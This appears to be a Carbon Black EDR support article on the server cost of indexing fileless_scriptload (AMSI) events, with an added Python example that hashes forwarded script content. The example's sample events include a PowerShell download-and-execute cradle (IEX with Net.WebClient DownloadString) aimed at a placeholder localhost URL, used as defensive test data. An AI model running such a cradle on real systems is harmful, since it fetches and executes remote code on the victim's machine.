EDR: Does the Fileless_Scriptloads Data Impact the EDR Server Performance?
Article ID: 287666
Products
Carbon Black EDR (formerly Cb Response)
Issue/Introduction
Does the fileless_scriptloads event data impact the EDR Server's performance?
Environment
EDR Server: 7.6+
Resolution
During fileless_scriptload data ingress, Solr uses additional CPU and memory to process and index each event's script content, which can be up to 32 KB per event.
During a Process Search on fileless script content, the Solr index is designed to handle searches of large as well as small fields efficiently. Where a hash is sufficient (for example, when hunting for a known script across endpoints), search on the SHA-256 hash of the script text rather than on the text itself; the hash is a fixed-size field and is far cheaper to match than free text up to 32 KB long.
Additional Information
AMSI fileless script collection is configurable per sensor group, so it can be enabled only for the endpoints that require AMSI collection, which also bounds the volume of script content sent to the server.
The fileless_scriptload event represents each occasion on which the sensor detected AMSI-decoded script content being executed by any process.
Only script content that was not stored in a file on the file system at the time it was executed is sent to the EDR server; scripts run from a file on disk are not reported through this event.
The fileless_scriptload data is a new event type stored and indexed in Solr.
The fileless_scriptload event leverages the Antimalware Scan Interface (AMSI) support that is available in Windows 10 RS2 and later and in Windows Server 2016.
To forward these events to a SIEM, enable the ingress.event.filelessscriptload checkbox in the Event Forwarder under Events > Sensor.
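As an added example (not code from the article or from Carbon Black), the following Python script consumes the Event Forwarder's JSON-lines output for ingress.event.filelessscriptload and applies the two pieces of advice above: it replaces the potentially 32 KB script text in each record with its SHA-256 hash and size, keeps the full text once per unique hash in a side table, and looks up hosts by hash instead of by text. The sample lines are constructed for this example, and every field name other than "type" (script, process_guid, computer_name, timestamp) is an assumption about the forwarder's output format, not taken from its documentation; verify them against your own forwarder output before using the script.

```python
import hashlib
import json
from typing import Dict, List, Tuple

# The article's per-event upper bound for indexed script content.
MAX_SCRIPT_BYTES = 32 * 1024

# Constructed sample in the JSON-lines shape the event forwarder emits (one
# object per line). Field names other than "type" are assumptions made for
# this example. The third event carries a deliberately oversized script and
# the fourth is a different event type that must be ignored.
SAMPLE_LINES = "\n".join(json.dumps(e) for e in [
    {"type": "ingress.event.filelessscriptload", "timestamp": 1700000000,
     "computer_name": "WS01", "process_guid": "00000001-0000-1234-01da-000000000001",
     "script": "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1/a.ps1')"},
    {"type": "ingress.event.filelessscriptload", "timestamp": 1700000060,
     "computer_name": "WS02", "process_guid": "00000001-0000-1234-01da-000000000002",
     "script": "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1/a.ps1')"},
    {"type": "ingress.event.filelessscriptload", "timestamp": 1700000120,
     "computer_name": "WS03", "process_guid": "00000001-0000-1234-01da-000000000003",
     "script": "$b = '" + "A" * 40000 + "'; Invoke-Expression $b"},
    {"type": "ingress.event.procstart", "timestamp": 1700000180,
     "computer_name": "WS01", "process_guid": "00000001-0000-1234-01da-000000000004"},
])


def script_sha256(script: str) -> str:
    """Hash the script text (as UTF-8) to get a fixed-size key for search
    and deduplication. The article does not say how the sensor normalizes
    text before hashing, so this example computes its own hash locally."""
    return hashlib.sha256(script.encode("utf-8")).hexdigest()


def parse_forwarder_lines(text: str) -> List[dict]:
    """Parse JSON-lines output and keep only fileless script load events."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            obj = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip a malformed line rather than abort the feed
        if obj.get("type") == "ingress.event.filelessscriptload":
            events.append(obj)
    return events


def compact_events(events: List[dict]) -> Tuple[List[dict], Dict[str, str]]:
    """Replace each event's script text with its hash and byte size, and
    store the full text once per unique hash so the SIEM index only carries
    the hash. Flags scripts larger than the article's 32 KB figure."""
    records = []
    script_store: Dict[str, str] = {}
    for ev in events:
        script = ev.get("script", "")
        digest = script_sha256(script)
        size = len(script.encode("utf-8"))
        script_store.setdefault(digest, script)
        records.append({
            "timestamp": ev.get("timestamp"),
            "computer_name": ev.get("computer_name"),
            "process_guid": ev.get("process_guid"),
            "script_sha256": digest,
            "script_bytes": size,
            "oversize": size > MAX_SCRIPT_BYTES,
        })
    return records, script_store


def hosts_for_hash(records: List[dict], digest: str) -> List[str]:
    """Hunting by hash: which hosts executed this exact script content?"""
    return sorted({r["computer_name"] for r in records if r["script_sha256"] == digest})


if __name__ == "__main__":
    recs, store = compact_events(parse_forwarder_lines(SAMPLE_LINES))
    for r in recs:
        print(r["computer_name"], r["script_sha256"][:16], r["script_bytes"], r["oversize"])
    print(len(store), "unique scripts stored")
    print("hosts running first script:", hosts_for_hash(recs, recs[0]["script_sha256"]))
```

Keeping the full text in a separate store (here an in-memory dict; in practice a cold table or object storage) means the searchable index never grows with script size, and a hit on a hash can still be expanded to the original content for analysis.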